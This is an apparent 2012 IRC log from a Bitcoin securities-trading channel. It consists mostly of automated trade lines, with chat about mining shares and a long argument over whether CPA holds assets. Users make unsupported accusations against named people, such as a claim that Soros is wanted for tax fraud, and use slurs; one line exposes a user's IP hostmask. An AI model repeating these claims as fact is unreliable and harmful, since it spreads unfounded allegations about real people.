[GLBSE] [OBSI.HRPT] 2 @ 0.1015899 = 0.2032 BTC [-] Sep 09 03:02:31 [MPEX] [S.MPOE] 1988 @ 0.00040016 = 0.7955 BTC [+] Sep 09 03:02:32 [MPEX] [S.MPOE] 21334 @ 0.00040035 = 8.5411 BTC [+] Sep 09 03:04:11 [GLBSE] [ASICMINER] 39 @ 0.1003 = 3.9117 BTC [-] Sep 09 03:04:12 [GLBSE] [ASICMINER] 25 @ 0.1002 = 2.505 BTC [-] Sep 09 03:04:14 [GLBSE] [ASICMINER] 36 @ 0.1 = 3.6 BTC [-] Sep 09 03:04:59 rdponticelli now that's true. Sep 09 03:05:15 Yeap... Sep 09 03:05:29 [GLBSE] [ASICMINER] 60 @ 0.1 = 6 BTC [-] Sep 09 03:05:31 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC [-] Sep 09 03:05:52 And if it was not, and you're a coder, you anyway have to code as if it was Sep 09 03:10:39 [GLBSE] [BITCOINMINV] 1 @ 0.11 BTC [-] Sep 09 03:10:41 [GLBSE] [BITCOINMINV] 39 @ 0.1 = 3.9 BTC [-] Sep 09 03:11:05 [GLBSE] [BITCOINMINV] 1 @ 0.1 BTC [-] Sep 09 03:15:47 [GLBSE] [OBSI.HRPT] 3 @ 0.1011 = 0.3033 BTC [-] Sep 09 03:15:48 [GLBSE] [OBSI.HRPT] 40 @ 0.101 = 4.04 BTC [-] Sep 09 03:23:56 [GLBSE] [FOO.PPPPT] 10 @ 0.09 = 0.9 BTC [-] Sep 09 03:23:58 [GLBSE] [FOO.PPPPT] 10 @ 0.08 = 0.8 BTC [-] Sep 09 03:23:59 [GLBSE] [FOO.PPPPT] 28 @ 0.07 = 1.96 BTC [-] Sep 09 03:24:33 [MPEX] [F.GIGA.ETF] 14400 @ 0.00050528 = 7.276 BTC [+] Sep 09 03:24:35 [MPEX] [F.GIGA.ETF] 35704 @ 0.00051526 = 18.3968 BTC [+] Sep 09 03:24:36 [MPEX] [F.GIGA.ETF] 5100 @ 0.00051537 = 2.6284 BTC [+] Sep 09 03:24:37 [MPEX] [F.GIGA.ETF] 12600 @ 0.00051957 = 6.5466 BTC [+] Sep 09 03:24:38 [MPEX] [F.GIGA.ETF] 23573 @ 0.00053725 = 12.6646 BTC [+] Sep 09 03:24:40 [MPEX] [F.GIGA.ETF] 8623 @ 0.00055 = 4.7427 BTC [+] Sep 09 03:24:55 !ticker gigamining Sep 09 03:24:59 [GLBSE:GIGAMINING] [Bid: 0.65] [Ask: 0.69978] [Spread: 0.04978] [Last: 0.6] [24hVol: 216.49771031] [7dAvg: 0.78434102] Sep 09 03:25:02 !ticker f.giga.etf Sep 09 03:25:04 [MPEX:F.GIGA.ETF] 1day: 0.0005 / 0.00062107 / 0.0007446 (566480 shares, 351.83 BTC), 30day: 0.0005 / 0.00091494 / 0.00115139 (11187380 shares, 10,235.85 BTC) Sep 09 03:26:09 [GLBSE] [GSDPT] 33 @ 0.003395 = 0.112 BTC [+] Sep 09 03:26:46 [GLBSE] [GSDPT] 33 @ 0.003395 = 0.112 BTC [+] Sep 09 03:27:31 [GLBSE] [GSDPT] 100 @ 0.003395 = 0.3395 BTC [+] Sep 09 03:29:01 [GLBSE] [GSDPT] 44 @ 0.003395 = 0.1494 BTC [+] Sep 09 03:36:28 this is insane or retarded or both https://bitcointalk.org/index.php?topic=104275.60 Sep 09 03:38:27 [GLBSE] [NYAN.B] 6 @ 0.988 = 5.928 BTC [-] Sep 09 03:38:28 [GLBSE] [NYAN.B] 14 @ 0.989 = 13.846 BTC [+] Sep 09 03:48:40 the only time i bought forum advertising it was something like 5 btc and had a pretty bad roi. Sep 09 03:52:31 [GLBSE] [OBSI.HRPT] 1 @ 0.1015898 BTC [+] Sep 09 03:53:28 mircea_popescu: It's because Theymos doesn't believe in images Sep 09 03:53:38 maybe Sep 09 03:54:21 Wow, the asic fever is driving everybody nuts Sep 09 03:56:56 If I had the money, I would just buy my own round of ASICs and keep them to myself Sep 09 03:59:11 [GLBSE] [ASICMINER] 39 @ 0.0999 = 3.8961 BTC [-] Sep 09 03:59:12 [GLBSE] [ASICMINER] 31 @ 0.1 = 3.1 BTC [+] Sep 09 04:03:07 [MPEX] [S.MPOE] 51531 @ 0.00039884 = 20.5526 BTC [-] Sep 09 04:05:39 [GLBSE] [SS] 70 @ 0.0179 = 1.253 BTC [-] Sep 09 04:06:17 [MPEX] [F.GIGA.ETF] 400 @ 0.00050586 = 0.2023 BTC [-] Sep 09 04:06:18 [MPEX] [F.GIGA.ETF] 100 @ 0.00055 = 0.055 BTC [+] Sep 09 04:07:58 [GLBSE] [OBSI.HRPT] 7 @ 0.1015898 = 0.7111 BTC [+] Sep 09 04:08:36 [GLBSE] [OBSI.HRPT] 5 @ 0.1015899 = 0.5079 BTC [+] Sep 09 04:09:22 [GLBSE] [RAREEARTH] 10 @ 0.00955 = 0.0955 BTC [-] Sep 09 04:09:34 [GLBSE] [OBSI.HRPT] 10 @ 0.1015899 = 1.0159 BTC [+] Sep 09 04:09:49 [GLBSE] [OBSI.HRPT] 1 @ 0.1015899 BTC [+] Sep 09 04:10:17 [GLBSE] [OBSI.HRPT] 3 @ 0.1015899 = 0.3048 BTC [+] Sep 09 04:10:29 rg mk so word from voorhees is that the thing happens when the bet volume is very large, but they;re working on it. Sep 09 04:19:25 [GLBSE] [OBSI.HRPT] 1 @ 0.1015899 BTC [+] Sep 09 04:31:29 http://cdn.oddstuffmagazine.com/wp-content/uploads/2012/09/512.jpg the chinese have turned the rivers commie Sep 09 04:35:31 I am pretty sure that is blatant water poisoning gone horribly wrong. Sep 09 04:36:18 Soros, a liberal philanthropist who rose to fame as an investor on a big bet against the British pound in 1992, said a Germany-free euro zone could be more competitive in exports and service its debts more cheaply with a weaker, France-led "Latin" euro. Sep 09 04:36:22 lmao that asshat. Sep 09 04:36:34 i wonder how much he makes if euro splits. all told. Sep 09 04:36:38 10 bn ? 100 bn ? Sep 09 04:39:34 [GLBSE] [GIGAMINING] 14 @ 0.6699 = 9.3786 BTC [+] Sep 09 04:39:36 [GLBSE] [GIGAMINING] 41 @ 0.67 = 27.47 BTC [+] Sep 09 04:39:37 [GLBSE] [GIGAMINING] 5 @ 0.696 = 3.48 BTC [+] Sep 09 04:39:38 [GLBSE] [GIGAMINING] 2 @ 0.69988 = 1.3998 BTC [+] Sep 09 04:39:39 [GLBSE] [GIGAMINING] 2 @ 0.69989 = 1.3998 BTC [+] Sep 09 04:43:42 mircea_popescu: 10 billion sounds right. Sep 09 04:43:53 [GLBSE] [BDT] 1 @ 0.99 BTC [-] Sep 09 04:43:55 he's worth about 20 or so Sep 09 04:45:00 At least that's what he reports Sep 09 04:46:07 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 09 04:46:22 obviously hard to know for sure. Sep 09 04:47:14 Well, imagine you have billions of dollars. Are you really going to report everything you have and pay taxes on it if you can get by not doing so? Sep 09 04:47:23 Especially with that amount of monetary clout? Sep 09 04:47:58 [GLBSE] [NYAN.B] 16 @ 0.989 = 15.824 BTC [+] Sep 09 04:48:00 [GLBSE] [NYAN.B] 9 @ 0.99 = 8.91 BTC [+] Sep 09 04:48:06 he's not paying taxes lol Sep 09 04:48:19 the reason he can't set foot in the us is that he's wanted for tax fraud/evasion Sep 09 04:48:30 lol Sep 09 04:49:24 Anyways, whistleblowers claim the wealthiest families of this world have tens of trillions of dollars in vastly networked trusts. Sep 09 04:49:33 Probably that is a understatement. Sep 09 04:49:43 Wealth can be hidden relatively easily Sep 09 04:49:47 assuming you have the wealth. Sep 09 04:50:12 dollars are unfortunately worthless, but sure. Sep 09 04:50:23 Well, that was a valuation of their assets. Sep 09 04:50:35 I mean, of course no trillionaire is keeping US dollaarsx Sep 09 04:50:38 dollars* Sep 09 04:50:39 lol Sep 09 04:50:51 [GLBSE] [BMMO] 10 @ 0.07699999 = 0.77 BTC [-] Sep 09 04:59:10 [GLBSE] [OBSI.ABMO] 2 @ 0.1 = 0.2 BTC [+] Sep 09 05:01:15 [GLBSE] [FUTUREFUND] 18 @ 0.00012433 = 0.0022 BTC [+] Sep 09 05:03:39 [GLBSE] [GSDPT] 4 @ 0.0034 = 0.0136 BTC [+] Sep 09 05:08:56 [MPEX] [S.BVPS] 150 @ 0.00348181 = 0.5223 BTC [+] Sep 09 05:14:38 [GLBSE] [ASICMINER] 100 @ 0.101 = 10.1 BTC [+] Sep 09 05:14:40 [GLBSE] [ASICMINER] 100 @ 0.102 = 10.2 BTC [+] Sep 09 05:14:41 [GLBSE] [ASICMINER] 25 @ 0.103 = 2.575 BTC [+] Sep 09 05:17:32 [GLBSE] [OBSI.HRPT] 2 @ 0.101 = 0.202 BTC [-] Sep 09 05:19:21 [GLBSE] [GSDPT] 4000 @ 0.0034 = 13.6 BTC [+] Sep 09 05:21:07 [GLBSE] [BIF.P2P.LOANS] 133 @ 0.1 = 13.3 BTC Sep 09 05:21:08 [GLBSE] [BIF.P2P.LOANS] 250 @ 0.11 = 27.5 BTC [+] Sep 09 05:22:53 [MPEX] [S.MPOE] 8769 @ 0.00039884 = 3.4974 BTC [-] Sep 09 05:22:59 [GLBSE] [TICKER] 204 @ 0.46 = 93.84 BTC [+] Sep 09 05:29:00 [MPEX] [S.MPOE] 24257 @ 0.00040021 = 9.7079 BTC [+] Sep 09 05:30:47 who wants to buy my hashking debt Sep 09 05:33:54 [MPEX] [S.MPOE] 7998 @ 0.00039711 = 3.1761 BTC [-] Sep 09 05:33:55 [MPEX] [S.MPOE] 1102 @ 0.00039693 = 0.4374 BTC [-] Sep 09 05:37:25 [GLBSE] [OBSI.HRPT] 99 @ 0.1001 = 9.9099 BTC [-] Sep 09 05:37:27 [GLBSE] [OBSI.HRPT] 101 @ 0.10001 = 10.101 BTC [-] Sep 09 05:41:30 [GLBSE] [OBSI.HRPT] 96 @ 0.10001 = 9.601 BTC [-] Sep 09 05:50:30 [GLBSE] [DI.BFLSC.FAIL] 40 @ 0.001 = 0.04 BTC [+] Sep 09 05:52:51 [MPEX] [F.GIGA.ETF] 4900 @ 0.00053961 = 2.6441 BTC [-] Sep 09 05:52:53 [MPEX] [F.GIGA.ETF] 31400 @ 0.00054147 = 17.0022 BTC [+] Sep 09 05:52:54 [MPEX] [F.GIGA.ETF] 43700 @ 0.00055 = 24.035 BTC [+] Sep 09 05:54:12 [MPEX] [F.GIGA.ETF] 112778 @ 0.00055 = 62.0279 BTC [+] Sep 09 05:54:14 [MPEX] [F.GIGA.ETF] 2222 @ 0.0007446 = 1.6545 BTC [+] Sep 09 05:58:56 [GLBSE] [OBSI.HRPT] 1 @ 0.1009 BTC [+] Sep 09 05:59:32 [GLBSE] [OBSI.HRPT] 8 @ 0.101 = 0.808 BTC [+] **** BEGIN LOGGING AT Sun Sep 9 12:31:25 2012 Sep 09 12:34:49 [GLBSE] [NYAN] 7 @ 0.975 = 6.825 BTC [-] Sep 09 12:45:59 [GLBSE] [JAH] 30 @ 0.148 = 4.44 BTC [-] Sep 09 12:46:52 CPA is getting sold down hard Sep 09 12:47:06 are the assets the hold publis somewhere? Sep 09 12:54:25 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 09 12:54:30 Well it's time to hold a vote. : P Sep 09 12:55:05 Oh Sep 09 12:59:32 7 btc worth hardly seems worth the notice. Sep 09 13:00:45 [MPEX] [S.MPOE] 6909 @ 0.00039541 = 2.7319 BTC [-] Sep 09 13:00:46 [MPEX] [S.MPOE] 29400 @ 0.0003954 = 11.6248 BTC [-] Sep 09 13:00:47 [MPEX] [S.MPOE] 2400 @ 0.00039537 = 0.9489 BTC [-] Sep 09 13:00:48 [MPEX] [S.MPOE] 7391 @ 0.00039534 = 2.922 BTC [-] Sep 09 13:00:53 [MPEX] [S.MPOE] 2800 @ 0.00039534 = 1.107 BTC [-] Sep 09 13:01:14 .py 0.00039534 / 0.00039541 Sep 09 13:01:16 0.999822968564 Sep 09 13:01:29 ahahaah 0.02% over 18 btc ? lol Sep 09 13:02:30 hm? Sep 09 13:03:43 18btc of mpoe sold off, price drops 0.02% Sep 09 13:04:00 ah Sep 09 13:04:00 so you guy get called bankrupt cuz no assets and in responce you dont show you hold any assets? Sep 09 13:04:17 im talking about cpa Sep 09 13:04:35 and then shock cpa gets sold off Sep 09 13:04:47 its your business, i guess... best of luck. Sep 09 13:04:57 anyway have cpa to borrow? Sep 09 13:05:02 i will pay double dividends Sep 09 13:05:10 anyone* Sep 09 13:05:16 i want to short cpa Sep 09 13:05:27 im seeing if anyone will let me borrow more shares to short Sep 09 13:05:29 you two twinks need to chill out lol Sep 09 13:05:29 okay Sep 09 13:05:43 you will loan me 10,000 ? Sep 09 13:06:35 lol a cpa contract :) you know im going with the assumtion your guys have failed or are close to failing Sep 09 13:06:43 its like matthew insuring his own bet if he pays out Sep 09 13:07:49 you are not going to get much faith in the public on writting contracts if you cant show you have assets to back them up Sep 09 13:08:23 for me to win, cpa will have to fail, and thus have no money to pay me back with... Sep 09 13:08:45 the question is, how much if any do you ahve left... Sep 09 13:09:35 you run cpa, the board does almost nothing. (im told) Sep 09 13:09:52 no, i would just like to see a list of assets Sep 09 13:10:06 so i know if its sound enough to trust or not Sep 09 13:10:17 you are writting insurance but have nothing to back it.. its risky Sep 09 13:10:22 you the owner is saying its sound Sep 09 13:10:30 pirate said btcst was sound Sep 09 13:10:35 hashking said his shit was sound... Sep 09 13:10:48 but he didn't say what sound Sep 09 13:10:53 :) Sep 09 13:10:54 could have been a toilet-flush Sep 09 13:11:11 yes mutual of omaha has to report their assets every 3 months Sep 09 13:11:30 lmao who's Smoovious ? Sep 09 13:11:44 im going to go with what i was told, you guys have almost no assets or none, untiul im shown otherwise Sep 09 13:11:56 I'm Smoovious Sep 09 13:12:01 aha. well hello there. Sep 09 13:12:09 o/ Sep 09 13:12:15 [GLBSE] [CPA] 500 @ 0.02 = 10 BTC [+] Sep 09 13:12:23 if you give me 5000 il check for myself and then give you back the shares... Sep 09 13:12:23 ;;ident Smoovious Sep 09 13:12:24 Nick 'Smoovious', with hostmask 'Smoovious!~imp586@75-12-89-18.lightspeed.wyngmi.sbcglobal.net', is not identified. Sep 09 13:12:47 you know you really should get into the otc. Sep 09 13:12:54 otc wot* Sep 09 13:13:00 [GLBSE] [UDN] 1 @ 0.04500001 BTC [-] Sep 09 13:13:02 [GLBSE] [UDN] 3 @ 0.045 = 0.135 BTC [-] Sep 09 13:13:10 yeah, one of these days Sep 09 13:13:26 didn't seem important since I haven't been doing any person-to-person exchanges Sep 09 13:13:41 otc is going down hill, people are not using it to troll Sep 09 13:13:43 well, it's really a gauge of overall trustworthyness. Sep 09 13:13:51 more people that use it, the more fial it will be Sep 09 13:14:02 you;'ll be sorry a year from now if you're undistinguishable from a scammer that just joined. Sep 09 13:14:04 you have to trust the users, and most of the users currently cant be trusted Sep 09 13:14:13 pirate still a good rating Sep 09 13:14:13 just google me... I've been using the same nick since ~1985 Sep 09 13:14:18 Chaang-Noi who exactly asked for your delusions ? Sep 09 13:14:31 Smoovious i know what you're thinking but that's not exactly how it works here. Sep 09 13:14:49 just sayin. anyway. Sep 09 13:14:56 people are using it to troll is a fact :/ Sep 09 13:15:08 also to get reveng Sep 09 13:15:10 plenty of others are already familiar with me... besides... a rating number isn't going to say anything... if I was a scammer, I'd just proxy myself up a few dozen +10's... Sep 09 13:15:20 yeah Sep 09 13:15:30 i dont use it either Sep 09 13:15:34 that's also not exactly how it works. Sep 09 13:15:52 what matters is your age and who connects you, not that you got dozens of 10s Sep 09 13:16:38 automatic distrust of a new face is normal... numbers won't matter either... you'll either think I'm ok or not, for yourself, given time... and I'm not gonna try to make nice about it just to earn people's trust... ya either do or ya don't... just the way it should be Sep 09 13:17:00 Smoovious the thing with an wot id is that you can prove you're you. Sep 09 13:17:02 that's the big deal. Sep 09 13:17:11 anyone can come in make a nick and claim they're obama. Sep 09 13:17:24 but if obama makes a wot and signs with his keys, then only he who has the keys can claim this anymore Sep 09 13:17:28 big difference, that. Sep 09 13:17:32 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 09 13:18:01 if that kind of thing matters to you, sure... doesn't matter much to me... I judge people based on direct dealing with them... just my way Sep 09 13:18:16 you could be dealing with an impostor and never know. Sep 09 13:18:39 [MPEX] [S.MPOE] 200 @ 0.00039568 = 0.0791 BTC [+] Sep 09 13:18:41 [MPEX] [S.MPOE] 19200 @ 0.0003959 = 7.6013 BTC [+] Sep 09 13:18:59 so, no different than real life then... people with their fake faces all the time, pretending they're something they're not Sep 09 13:19:18 well, I did used to be a musician, so bandwagon jumping just comes natural Sep 09 13:19:21 well, the only difference is that here you have signatures. if you're in the wot. Sep 09 13:19:31 dude... let it go Sep 09 13:20:41 besides... so what if I sign it with a signature... still doesn't prove it is me unless I get an authenticated digital signature from verisign or something, where they've verified my documents etc Sep 09 13:21:10 Smoovious you will learn to ignor mircea if you stay around. don't try to reason with him. Sep 09 13:21:17 lieberman-collins comes back as... a house order :D http://www.federalnewsradio.com/241/3026867/White-House-draft-cyber-order-lays-out-critical-infrastructure-protections Sep 09 13:21:31 usagi: and he doesn't know about me. :) this verbal dance we're doing between us, is part of that learning process, while we verbally spare, and figure each other out. :) Sep 09 13:22:13 Smoovious you're being ignorant on the matter tho. you don't need verizon to know it's you. you just need to pick a signature, declare it as yours and that's that. you can be identified as "he who picked that signature" Sep 09 13:24:39 mircea_popescu: it isn't "ignorant" as such... I just don't give a shit about it Sep 09 13:24:48 there's a difference between ignorance and apathy Sep 09 13:25:21 besides... I don't use PGP... Sep 09 13:25:28 well, the difference between ignorance and apathy is that the apathetic just let the matter drop, whereas the ignorant make false statements of fact, which then i feel compelled to counter so that noobs don't get misinformed. Sep 09 13:25:34 pretty gay person lol Sep 09 13:25:56 so, I'm apathetic, and you're ignorant, is that what you're getting at? Sep 09 13:26:22 lol. how very dunning-kruger Sep 09 13:26:22 I don't even know Sep 09 13:26:42 and a deflection instead of a direct response... I win \o/ Sep 09 13:26:59 Smoovious!*@* added to ignore list. Sep 09 13:28:28 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 09 13:35:04 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 09 13:38:12 [MPEX] [B.MPCD.C] 50000 @ 0.00103331 = 51.6655 BTC [+] Sep 09 13:38:40 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 09 13:43:38 [GLBSE] [ASICMINER] 39 @ 0.0999 = 3.8961 BTC [-] Sep 09 13:43:40 [GLBSE] [ASICMINER] 75 @ 0.1 = 7.5 BTC [+] Sep 09 13:48:01 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 09 13:48:04 [MPEX] [B.MPCD.C] 17000 @ 0.00103333 = 17.5666 BTC [+] Sep 09 13:48:07 whoa asicminer under .1 ? Sep 09 13:48:37 oh lol inaba overbid cablepair Sep 09 13:48:40 10@20.25 btc Sep 09 13:48:43 seriously fucked up Sep 09 13:48:52 LOL Sep 09 13:49:01 EVERYBODY BUY BUY BUY Sep 09 13:49:07 at least cablepair is getting some money out of bfl Sep 09 13:49:25 wtf is going on, did the forum suddenly become useful ? Sep 09 13:49:33 $250 a month for a spot of 10 ?! Sep 09 13:49:45 round 48 you could get a spot for 1btc Sep 09 13:49:54 round 49 20btc+ Sep 09 13:50:26 im nto even sure it's worth the 1. Sep 09 13:52:19 asics guys are fighting Sep 09 13:52:23 its lol Sep 09 13:52:41 i won on accedent two slots for 1.5 so i linked it to a goat ona boat thread Sep 09 13:52:50 cuz no real use Sep 09 13:52:59 butyeah these prices are crazy Sep 09 14:05:08 ;;later tell theymos hey drop me a line, I wanna discuss something. Sep 09 14:05:09 The operation succeeded. Sep 09 14:05:31 he comes to irc? Sep 09 14:05:49 when he wants to check my ip Sep 09 14:05:52 ocasionalyl lol Sep 09 14:05:53 to compare to alt accounts Sep 09 14:06:26 Bane_Capital you have a cloak dontcha Sep 09 14:06:45 No I do Sep 09 14:07:00 Now* Sep 09 14:07:07 [GLBSE] [BITCOINMINV] 1 @ 0.115 BTC [+] Sep 09 14:07:08 That's a sign that I am tired Sep 09 14:08:13 http://bitcoin-otc.com/viewratingdetail.php?nick=phantomcircuit&sign=ANY&type=RECV whoa patrick is now in the - ?! Sep 09 14:09:03 wait Sep 09 14:09:09 Patrick is phantomcircuit? Sep 09 14:09:14 uh? Sep 09 14:09:29 afaik no? Sep 09 14:09:58 Bane_Capital yes. kakobrekla yes. Sep 09 14:10:15 PatrickHarnett? Sep 09 14:10:19 The Spongebob guy? Sep 09 14:10:27 http://bitcoin-otc.com/viewratingdetail.php?nick=genjix&sign=ANY&type=RECV taaki too Sep 09 14:10:34 Bane_Capital o, no. patrick stateman Sep 09 14:10:49 Oh, okay. Sep 09 14:11:03 the intersango/bitcoin consultancy/failed conference/etc guys Sep 09 14:11:28 I am going to buy the Bitcoin Consultancy trademark Sep 09 14:11:35 I wonder how much it is going for Sep 09 14:11:40 The company name I mean Sep 09 14:12:01 i had some dealings with phantomcircuit Sep 09 14:12:16 thought it was ok guy at the begining but now i suspect hes an idiot Sep 09 14:12:45 kakobrekla iirc he's the one who mailed the entire list a list of all the email addresses in the list Sep 09 14:12:54 via python Sep 09 14:13:01 lol Sep 09 14:13:41 was a kinda funny event last year. Sep 09 14:15:32 well what i saw was a poor business ethics Sep 09 14:18:01 Bane_Capital i bet it's not a registered trademark Sep 09 14:18:07 just go register it yourself and that's that. Sep 09 14:18:19 lol Sep 09 14:19:26 [GLBSE] [GIGAMINING] 14 @ 0.7199 = 10.0786 BTC [+] Sep 09 14:20:06 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 09 14:28:47 [MPEX] [F.GIGA.ETF] 4700 @ 0.00068047 = 3.1982 BTC [-] Sep 09 14:28:49 [MPEX] [F.GIGA.ETF] 14200 @ 0.00067821 = 9.6306 BTC [-] Sep 09 14:29:27 Matthew still isn't paying his writers Sep 09 14:29:35 Bitcoin Magazine is ran off slave labor Sep 09 14:33:45 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Sep 09 14:39:03 [MPEX] [S.MPOE] 26358 @ 0.0003959 = 10.4351 BTC [+] Sep 09 14:41:56 [GLBSE] [GIGAMINING] 2 @ 0.7199 = 1.4398 BTC [+] Sep 09 14:57:20 [GLBSE] [GIPPT] 80 @ 0.45 = 36 BTC [-] Sep 09 14:58:16 [GLBSE] [BITBOND] 5 @ 0.4269 = 2.1345 BTC [+] Sep 09 14:59:35 [GLBSE] [GIGAMINING] 8 @ 0.72 = 5.76 BTC [+] Sep 09 15:00:47 [GLBSE] [TYGRR.BOND-P] 14 @ 0.058 = 0.812 BTC [-] Sep 09 15:02:02 that was a buy i think Sep 09 15:02:30 some one just went crazy with a dollar lol Sep 09 15:17:08 [MPEX] [S.MPOE] 200 @ 0.00039568 = 0.0791 BTC [-] Sep 09 15:17:10 [MPEX] [S.MPOE] 3309 @ 0.00039534 = 1.3082 BTC [-] Sep 09 15:18:00 [GLBSE] [BDT] 3 @ 0.98 = 2.94 BTC [-] Sep 09 15:29:15 [GLBSE] [PPT.DIV] 6 @ 0.025 = 0.15 BTC [+] Sep 09 15:29:59 [GLBSE] [BDK.BND] 12 @ 0.1004 = 1.2048 BTC [+] Sep 09 15:36:46 [MPEX] [S.MPOE] 10000 @ 0.00039534 = 3.9534 BTC [-] Sep 09 15:36:47 [MPEX] [S.MPOE] 21100 @ 0.00039528 = 8.3404 BTC [-] Sep 09 15:36:48 [MPEX] [S.MPOE] 28300 @ 0.00039525 = 11.1856 BTC [-] Sep 09 15:36:59 [GLBSE] [ASICMINER] 100 @ 0.0975 = 9.75 BTC [-] Sep 09 15:38:10 lol cpa has no assets so i wont take a contract backed by no assets, its like working with matthew and no escrow, its crazy Sep 09 15:40:56 wat? Sep 09 15:41:17 i do not trust you usagi, we can put the coin in escrow then sure. im interested Sep 09 15:41:44 cpa has no assets they are willing to show Sep 09 15:41:57 usagi claims he has assets Sep 09 15:41:57 i will work with you if you use escrow Sep 09 15:42:04 will you use esrow? Sep 09 15:42:11 will you use esrow? Sep 09 15:42:16 escrow? Sep 09 15:42:18 yes or no Sep 09 15:42:51 i want the full amount escrowed, i will do my side in full as well Sep 09 15:43:00 if no escrow no deal Sep 09 15:43:10 lol Sep 09 15:43:19 this is why i dont trust you, no assets no escrow Sep 09 15:44:00 let me know if you want to use escrow, go on claiming you can be trusted and all that, im sure people have made up their own minds... Sep 09 15:44:20 [MPEX] [S.MPOE] 200 @ 0.00039557 = 0.0791 BTC [+] Sep 09 15:44:21 [MPEX] [S.MPOE] 10242 @ 0.0003959 = 4.0548 BTC [+] Sep 09 15:44:23 [MPEX] [S.MPOE] 5743 @ 0.0003978 = 2.2846 BTC [+] Sep 09 15:44:24 [MPEX] [S.MPOE] 32015 @ 0.00039821 = 12.7487 BTC [+] Sep 09 15:45:54 im busy man, but yeah we can agree on an escrow if you are willing to put the whole value of the assets in escrow. Sep 09 15:46:13 i dont sell contracts backed by secret assets... Sep 09 15:46:39 14:46.07 ( Chaang-Noi ) i dont sell contracts backed by secret assets... Sep 09 15:46:47 isnt tygrr-p this in a way Sep 09 15:47:11 everyone knew tygrr-p was going to priate Sep 09 15:47:22 pirate was not secret Sep 09 15:47:23 just as everyone here knows cpa goes to usagi Sep 09 15:47:44 but im asking usagi for a list of assets cpa has, he says he wont show any Sep 09 15:47:57 did you ask pirate for a list of assets? Sep 09 15:47:59 he wants to sell insureance and have it backed by assets he claims to have Sep 09 15:48:25 pirate made it very clear what he was doing in his op. he was just wrong about zeek not being a ponzi lol Sep 09 15:48:54 usagi all i asked for was a list of asstes for cpa, cuz i was told you guys had neg balance... Sep 09 15:49:20 did you not read his op? Sep 09 15:50:02 let me know if you are going to show assets or use escrow... Sep 09 15:50:10 no i dont trust you. Sep 09 15:50:15 have a good day mate. Sep 09 15:50:18 3 hours btw Sep 09 15:50:24 i will lose Sep 09 15:50:31 cuz if you fold up, you ahve nothing to pay Sep 09 15:50:35 its a lose lose bet for me Sep 09 15:50:37 i wont take it Sep 09 15:50:38 [GLBSE] [BIB.BVPS] 96 @ 0.00445 = 0.4272 BTC [-] Sep 09 15:50:40 im not that dumb Sep 09 15:50:42 i need escrow Sep 09 15:50:55 i cant just trust that you can be trusted.. thats silly Sep 09 15:51:24 im not saying you are going to fold, im saying it seems risky cuz you wont show assets and people say you ahve none :/ Sep 09 15:51:35 whatever man Sep 09 15:51:42 show or not, up to you... Sep 09 15:52:04 yeah it was their assumption Sep 09 15:52:09 so i asked to see it Sep 09 15:52:11 you told me no Sep 09 15:52:14 so i said okay Sep 09 15:52:24 and then you want make bets with no escrow Sep 09 15:52:24 its silly Sep 09 15:52:30 id like to see the assets... Sep 09 15:52:33 if not fine Sep 09 15:52:34 just give it up Sep 09 15:52:40 im not going to bet you with no esrow Sep 09 15:52:56 past performance does not mean future results... Sep 09 15:52:59 due dillagance... Sep 09 15:53:10 CPA has assets? Sep 09 15:53:27 all i would like to know is does cpa really ahve assets... Sep 09 15:53:32 but that is secret :/ Sep 09 15:53:41 real world insurance companaies have to show they have assets Sep 09 15:54:36 lol do you know what that means? Sep 09 15:54:51 yeah, at least you are not faking your assets Sep 09 15:55:17 i do not trust you. Sep 09 15:55:17 i did not trust you before Sep 09 15:55:23 thats why i never got into cpa in the first place. Sep 09 15:55:54 yes, i made my self very clear. Sep 09 15:56:30 okay, since you will not show my that you have assets i can not invest in you. and no i do not trust you. :/ you will just have to live with that Sep 09 15:57:00 i really do not trust you, that is the gods truth Sep 09 15:57:20 why would i like about nottrusting you... Sep 09 15:57:25 anyway mate, best of luck... Sep 09 15:57:49 if i wanted to do insureance i would do better on my own. yeah that is true Sep 09 15:58:19 im not going to do it, and you would need assets to invest in my company... Sep 09 16:00:15 im not claiming to have assets Sep 09 16:00:57 usagi: yeah what a fucker Sep 09 16:01:03 you should just give all your asicminer shares to me Sep 09 16:01:06 usagi: Some men don't believe in commitments. Sep 09 16:01:18 There's a reason he moved to Thailand. : P Sep 09 16:01:20 usagi made a deal and wanted out, so we made a new deal... Sep 09 16:01:31 Bane_Capital: what, for the lady boys? Sep 09 16:01:38 Hahahaha Sep 09 16:01:47 im not the one claiming to have assets, my not having assets has nothing to do with cpa having assets Sep 09 16:02:04 usagi: haters gonna hate? Sep 09 16:02:15 yes smoovious it was an easy question, just wanted to see if cpa had real assets :/ and then herp a derp :( Sep 09 16:02:23 CPA has assets Sep 09 16:03:08 i wanted to know why it was a rumor.. and it looks like the rumor wont go away :/ cus no assets shown. Sep 09 16:03:13 CPA being shut down doesnt mean it doesnt have assets Sep 09 16:03:22 it means that it just isnt profitable to run anymore Sep 09 16:03:30 im sorry you dont like me usagi, i take that back. im not sorry but you will ahve to live with it usagi. im not a trusting guy... im from the show me state. you need to prove you have it, i wont take your word. Sep 09 16:03:34 HEY USAGI Sep 09 16:03:36 HEY USAGI Sep 09 16:03:40 ILL LOAN YOU ASSETS Sep 09 16:04:00 im not going to do anything to cpa Sep 09 16:04:07 i just asked a question Sep 09 16:04:11 im not going to attack you or cpa Sep 09 16:04:13 Chaang-Noi: there, CPA now has more assets than you do. Sep 09 16:04:20 i just wanted to see if you had any assets, you made a big deal of it Sep 09 16:04:33 Chaang-Noi: okay, fine Sep 09 16:04:36 you wanna see assets? Sep 09 16:04:40 This channel sure is butthurt. Sep 09 16:04:48 Okay Sep 09 16:04:50 Choke on that. Sep 09 16:04:56 I don't even Sep 09 16:05:07 im not out of line for asking you if cpa has assets... Sep 09 16:05:24 usagi: photso...er.. screenshot your glbse page Sep 09 16:05:27 and just cuz you wont show me assets dones not mean i need to go on the forum and have you shut down... Sep 09 16:05:31 i did my due 